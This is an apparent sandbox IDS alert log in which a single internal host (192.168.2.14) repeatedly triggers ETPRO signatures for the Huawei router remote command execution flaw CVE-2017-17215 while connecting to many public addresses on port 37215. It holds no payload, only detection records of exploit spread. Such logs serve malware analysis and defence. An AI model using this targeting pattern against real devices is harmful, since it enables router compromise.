                                                    07/10/24-08:26:43.772841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4171237215192.168.2.1441.118.72.232
                                                    07/10/24-08:26:34.239596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771637215192.168.2.14157.88.139.28
                                                    07/10/24-08:26:38.548975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649037215192.168.2.1441.96.190.120
                                                    07/10/24-08:27:08.425989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496637215192.168.2.1441.245.97.184
                                                    07/10/24-08:27:10.553055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391637215192.168.2.14157.181.24.40
                                                    07/10/24-08:27:10.554172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512237215192.168.2.1441.135.211.99
                                                    07/10/24-08:27:23.824127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357837215192.168.2.1441.145.167.37
                                                    07/10/24-08:27:28.035789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.1441.195.76.221
                                                    07/10/24-08:26:36.334261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806037215192.168.2.14157.221.95.75
                                                    07/10/24-08:26:15.831289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950037215192.168.2.14220.26.205.204
                                                    07/10/24-08:27:31.570253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305837215192.168.2.1441.80.85.162
                                                    07/10/24-08:27:02.878785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605437215192.168.2.14157.80.10.240
                                                    07/10/24-08:27:05.097626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738837215192.168.2.14157.98.85.186
                                                    07/10/24-08:27:31.555848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829437215192.168.2.14157.5.178.82
                                                    07/10/24-08:26:31.080592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874837215192.168.2.1441.227.26.184
                                                    07/10/24-08:26:59.774458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678637215192.168.2.14157.170.92.46
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612037215192.168.2.1438.1.173.153
                                                    07/10/24-08:27:07.376838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927037215192.168.2.14197.220.210.250
                                                    07/10/24-08:27:30.520394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522037215192.168.2.14157.102.228.53
                                                    07/10/24-08:26:53.171855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310437215192.168.2.1441.36.227.150
                                                    07/10/24-08:26:43.857125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.1441.248.35.73
                                                    07/10/24-08:26:38.549975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429037215192.168.2.14197.196.16.15
                                                    07/10/24-08:26:13.804743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067837215192.168.2.14157.90.123.92
                                                    07/10/24-08:26:22.223907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980437215192.168.2.14157.248.56.191
                                                    07/10/24-08:26:59.533067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815037215192.168.2.1441.207.86.156
                                                    07/10/24-08:26:28.912648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026237215192.168.2.14157.176.100.146
                                                    07/10/24-08:27:13.876848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318437215192.168.2.14203.50.192.231
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676437215192.168.2.14157.96.13.107
                                                    07/10/24-08:26:28.808876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311637215192.168.2.14197.5.217.150
                                                    07/10/24-08:27:28.128256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268437215192.168.2.14197.100.8.124
                                                    07/10/24-08:26:17.945424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061237215192.168.2.14197.174.123.222
                                                    07/10/24-08:26:47.886738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380237215192.168.2.14157.4.164.188
                                                    07/10/24-08:26:42.455188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952237215192.168.2.1441.99.29.110
                                                    07/10/24-08:26:15.827903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256037215192.168.2.1450.26.176.42
                                                    07/10/24-08:26:34.222865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845837215192.168.2.14197.231.57.195
                                                    07/10/24-08:26:59.718757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637837215192.168.2.1441.5.74.81
                                                    07/10/24-08:26:18.019477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234637215192.168.2.14197.21.197.157
                                                    07/10/24-08:26:38.511212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959637215192.168.2.142.244.153.180
                                                    07/10/24-08:26:28.938884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414437215192.168.2.14197.227.62.199
                                                    07/10/24-08:27:30.516492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747437215192.168.2.14157.135.117.148
                                                    07/10/24-08:26:41.562596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359637215192.168.2.1441.32.151.108
                                                    07/10/24-08:26:43.873718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287037215192.168.2.14197.110.57.33
                                                    07/10/24-08:27:23.930240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507437215192.168.2.14157.3.166.7
                                                    07/10/24-08:26:17.967013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736237215192.168.2.14197.10.161.2
                                                    07/10/24-08:27:10.625884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302637215192.168.2.14197.57.164.150
                                                    07/10/24-08:26:48.023936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054837215192.168.2.1441.251.69.70
                                                    07/10/24-08:26:43.772069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639437215192.168.2.14197.136.199.163
                                                    07/10/24-08:26:55.472197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255037215192.168.2.14157.172.51.157
                                                    07/10/24-08:27:10.561915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.1441.12.99.59
                                                    07/10/24-08:27:33.734859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384637215192.168.2.1457.3.183.164
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779837215192.168.2.14196.244.235.234
                                                    07/10/24-08:27:02.990301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161037215192.168.2.1441.182.233.4
                                                    07/10/24-08:26:29.812412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329437215192.168.2.14164.251.164.81
                                                    07/10/24-08:27:19.196013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127237215192.168.2.14197.232.61.121
                                                    07/10/24-08:26:53.180230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380637215192.168.2.14197.122.169.144
                                                    07/10/24-08:26:57.647317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235637215192.168.2.14157.189.242.81
                                                    07/10/24-08:27:24.954167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600037215192.168.2.14180.232.66.107
                                                    07/10/24-08:27:34.134892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332037215192.168.2.14153.30.80.26
                                                    07/10/24-08:27:14.881781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945237215192.168.2.14157.44.64.165
                                                    07/10/24-08:27:31.448205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993637215192.168.2.1419.53.196.246
                                                    07/10/24-08:26:59.721155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518037215192.168.2.14157.144.146.253
                                                    07/10/24-08:26:38.603168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492837215192.168.2.1473.241.5.134
                                                    07/10/24-08:26:11.176118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818037215192.168.2.14197.37.236.98
                                                    07/10/24-08:26:22.259501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428637215192.168.2.14197.64.1.77
                                                    07/10/24-08:26:13.755859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614437215192.168.2.14197.70.125.175
                                                    07/10/24-08:27:02.997296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501237215192.168.2.14107.186.127.165
                                                    07/10/24-08:27:16.994727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197237215192.168.2.1441.223.160.9
                                                    07/10/24-08:27:23.875941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829237215192.168.2.14197.158.223.103
                                                    07/10/24-08:27:20.450193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073037215192.168.2.14105.144.234.145
                                                    07/10/24-08:26:28.682326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.14119.220.244.20
                                                    07/10/24-08:27:27.103882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089437215192.168.2.1441.13.81.123
                                                    07/10/24-08:26:23.337851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561837215192.168.2.14157.85.174.74
                                                    07/10/24-08:27:22.773941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860037215192.168.2.14189.19.55.211
                                                    07/10/24-08:27:33.839511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581437215192.168.2.14133.230.126.182
                                                    07/10/24-08:26:41.536337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172437215192.168.2.14157.125.96.168
                                                    07/10/24-08:26:59.880494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748037215192.168.2.1441.186.69.107
                                                    07/10/24-08:27:30.522162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134637215192.168.2.1441.135.48.219
                                                    07/10/24-08:26:13.828221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429237215192.168.2.1441.235.102.19
                                                    07/10/24-08:27:23.491669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602037215192.168.2.14157.219.72.182
                                                    07/10/24-08:27:08.383825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757637215192.168.2.1441.250.140.89
                                                    07/10/24-08:26:13.753086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080837215192.168.2.1476.178.176.183
                                                    07/10/24-08:26:17.961786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383637215192.168.2.14197.99.192.159
                                                    07/10/24-08:26:25.469526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743037215192.168.2.1441.184.62.99
                                                    07/10/24-08:26:17.990229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320437215192.168.2.14100.204.7.29
                                                    07/10/24-08:26:38.658229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.14157.7.22.169
                                                    07/10/24-08:27:08.392064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958637215192.168.2.14157.16.54.156
                                                    07/10/24-08:27:28.130365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884837215192.168.2.1441.232.53.11
                                                    07/10/24-08:26:14.807023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611437215192.168.2.14157.101.211.248
                                                    07/10/24-08:26:29.858184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880837215192.168.2.14197.8.239.201
                                                    07/10/24-08:26:42.381033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527837215192.168.2.14197.123.171.220
                                                    07/10/24-08:26:45.615423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.14197.90.113.165
                                                    07/10/24-08:27:33.854802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373037215192.168.2.1441.147.39.23
                                                    07/10/24-08:26:41.395055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.1431.204.91.39
                                                    07/10/24-08:26:55.449293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423637215192.168.2.1477.124.96.251
                                                    07/10/24-08:26:23.309785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292437215192.168.2.1441.212.101.17
                                                    07/10/24-08:26:29.842120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334837215192.168.2.14157.238.203.107
                                                    07/10/24-08:26:42.399244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4559237215192.168.2.1443.196.160.117
                                                    07/10/24-08:27:14.807456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695237215192.168.2.1440.18.117.216
                                                    07/10/24-08:26:15.788826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957837215192.168.2.14157.52.121.25
                                                    07/10/24-08:26:33.222774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576437215192.168.2.14197.26.53.246
                                                    07/10/24-08:27:02.865689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301037215192.168.2.14110.30.75.88
                                                    07/10/24-08:27:20.483063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376037215192.168.2.14157.42.213.141
                                                    07/10/24-08:27:28.062110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301237215192.168.2.1441.229.163.186
                                                    07/10/24-08:26:42.416063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322437215192.168.2.14157.144.157.39
                                                    07/10/24-08:26:38.520024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.14166.155.221.55
                                                    07/10/24-08:27:17.064764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943037215192.168.2.1441.117.83.253
                                                    07/10/24-08:26:42.440336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857837215192.168.2.14157.233.250.255
                                                    07/10/24-08:26:59.837410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902837215192.168.2.1441.13.79.109
                                                    07/10/24-08:27:32.538525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767437215192.168.2.1441.246.248.220
                                                    07/10/24-08:27:02.994368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355637215192.168.2.14139.142.0.213
                                                    07/10/24-08:27:17.091554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370437215192.168.2.14197.54.162.123
                                                    07/10/24-08:26:45.628339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477037215192.168.2.1441.230.251.116
                                                    07/10/24-08:27:34.131322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876037215192.168.2.1441.154.90.31
                                                    07/10/24-08:26:42.455188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081037215192.168.2.14157.244.109.235
                                                    07/10/24-08:27:08.451424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262837215192.168.2.1497.64.250.155
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325037215192.168.2.14197.81.128.141
                                                    07/10/24-08:27:23.917692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428037215192.168.2.1441.113.48.112
                                                    07/10/24-08:26:20.113848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257037215192.168.2.1441.87.109.163
                                                    07/10/24-08:26:25.430208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740837215192.168.2.1473.104.119.73
                                                    07/10/24-08:26:52.078172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504437215192.168.2.14157.21.206.163
                                                    07/10/24-08:26:28.919298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667437215192.168.2.14157.228.254.114
                                                    07/10/24-08:26:47.857207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048437215192.168.2.14157.94.189.181
                                                    07/10/24-08:26:43.543257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488037215192.168.2.14197.118.62.131
                                                    07/10/24-08:26:55.422877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059437215192.168.2.14124.246.206.28
                                                    07/10/24-08:26:52.073471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479237215192.168.2.14197.227.160.222
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025437215192.168.2.14157.137.83.95
                                                    07/10/24-08:26:26.441172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068837215192.168.2.14157.26.238.219
                                                    07/10/24-08:27:08.318438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527637215192.168.2.14157.155.49.161
                                                    07/10/24-08:27:08.397659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226037215192.168.2.1441.193.171.158
                                                    07/10/24-08:26:28.739373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344637215192.168.2.14151.157.86.17
                                                    07/10/24-08:26:41.490874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.14157.251.124.134
                                                    07/10/24-08:27:02.730689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464237215192.168.2.14197.223.60.237
                                                    07/10/24-08:26:28.909178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371237215192.168.2.14197.32.116.25
                                                    07/10/24-08:27:30.538125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.1441.232.27.144
                                                    07/10/24-08:26:55.422877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947637215192.168.2.14190.206.85.55
                                                    07/10/24-08:26:38.566781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342837215192.168.2.14157.65.128.70
                                                    07/10/24-08:26:13.647852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613837215192.168.2.14197.13.120.109
                                                    07/10/24-08:26:13.758610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920437215192.168.2.14197.163.145.16
                                                    07/10/24-08:26:34.214709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237637215192.168.2.1441.122.178.44
                                                    07/10/24-08:27:19.251231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927637215192.168.2.14197.87.128.119
                                                    07/10/24-08:27:23.938620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.14197.248.87.154
                                                    07/10/24-08:26:23.273552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478637215192.168.2.1444.109.37.136
                                                    07/10/24-08:26:43.798286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936037215192.168.2.1441.221.13.152
                                                    07/10/24-08:26:34.229660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755437215192.168.2.1418.183.246.170
                                                    07/10/24-08:26:33.249183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518037215192.168.2.14197.116.116.172
                                                    07/10/24-08:26:59.835499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485837215192.168.2.1441.217.3.12
                                                    07/10/24-08:27:10.598272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.14157.217.173.118
                                                    07/10/24-08:26:11.220716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144437215192.168.2.14197.88.81.225
                                                    07/10/24-08:26:13.647460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701837215192.168.2.14197.110.93.162
                                                    07/10/24-08:27:02.702208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392437215192.168.2.14197.250.186.22
                                                    07/10/24-08:26:36.392323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012837215192.168.2.14157.154.9.4
                                                    07/10/24-08:26:42.412698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792237215192.168.2.14197.49.104.249
                                                    07/10/24-08:26:36.385173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675037215192.168.2.14197.99.147.60
                                                    07/10/24-08:27:05.169661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192837215192.168.2.14197.249.189.182
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142837215192.168.2.1441.31.254.147
                                                    07/10/24-08:26:42.427094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000637215192.168.2.14200.192.43.157
                                                    07/10/24-08:26:28.772141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879237215192.168.2.14211.191.171.246
                                                    07/10/24-08:26:11.178483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913637215192.168.2.14158.13.46.18
                                                    07/10/24-08:27:31.528141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767237215192.168.2.14197.66.81.48
                                                    07/10/24-08:26:38.655594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188637215192.168.2.1441.16.172.217
                                                    07/10/24-08:26:26.588414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554237215192.168.2.1441.239.15.88
                                                    07/10/24-08:27:13.868751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803437215192.168.2.14196.244.115.92
                                                    07/10/24-08:27:07.376641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132037215192.168.2.14157.236.138.155
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667037215192.168.2.1441.203.172.151
                                                    07/10/24-08:27:17.104843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927437215192.168.2.14197.139.237.26
                                                    07/10/24-08:26:11.136124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436437215192.168.2.1441.68.57.166
                                                    07/10/24-08:27:17.092016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482437215192.168.2.14197.224.145.183
                                                    07/10/24-08:27:02.847593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527037215192.168.2.1441.183.4.157
                                                    07/10/24-08:27:22.539034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126637215192.168.2.1441.178.254.36
                                                    07/10/24-08:26:31.083284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788437215192.168.2.14157.203.192.54
                                                    07/10/24-08:26:42.356515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239637215192.168.2.14157.109.67.237
                                                    07/10/24-08:27:05.135753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125237215192.168.2.14156.74.217.86
                                                    07/10/24-08:26:34.228514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4528037215192.168.2.1485.143.27.11
                                                    07/10/24-08:27:36.280780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981637215192.168.2.1441.182.241.50
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604637215192.168.2.14157.198.211.202
                                                    07/10/24-08:27:32.591904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649837215192.168.2.14197.62.152.196
                                                    07/10/24-08:26:47.840921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.14197.110.66.112
                                                    07/10/24-08:27:34.155156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803437215192.168.2.14197.50.60.172
                                                    07/10/24-08:26:28.756462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668637215192.168.2.14157.115.144.209
                                                    07/10/24-08:27:23.893892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184037215192.168.2.1441.112.136.237
                                                    07/10/24-08:27:33.758146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3976237215192.168.2.1441.149.59.134
                                                    07/10/24-08:26:43.842656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916837215192.168.2.14157.183.129.21
                                                    07/10/24-08:27:11.544699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779037215192.168.2.14137.19.8.225
                                                    07/10/24-08:26:53.204371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880637215192.168.2.1441.130.37.232
                                                    07/10/24-08:26:13.838798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667437215192.168.2.1441.129.207.1
                                                    07/10/24-08:26:59.793542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044237215192.168.2.14163.30.173.88
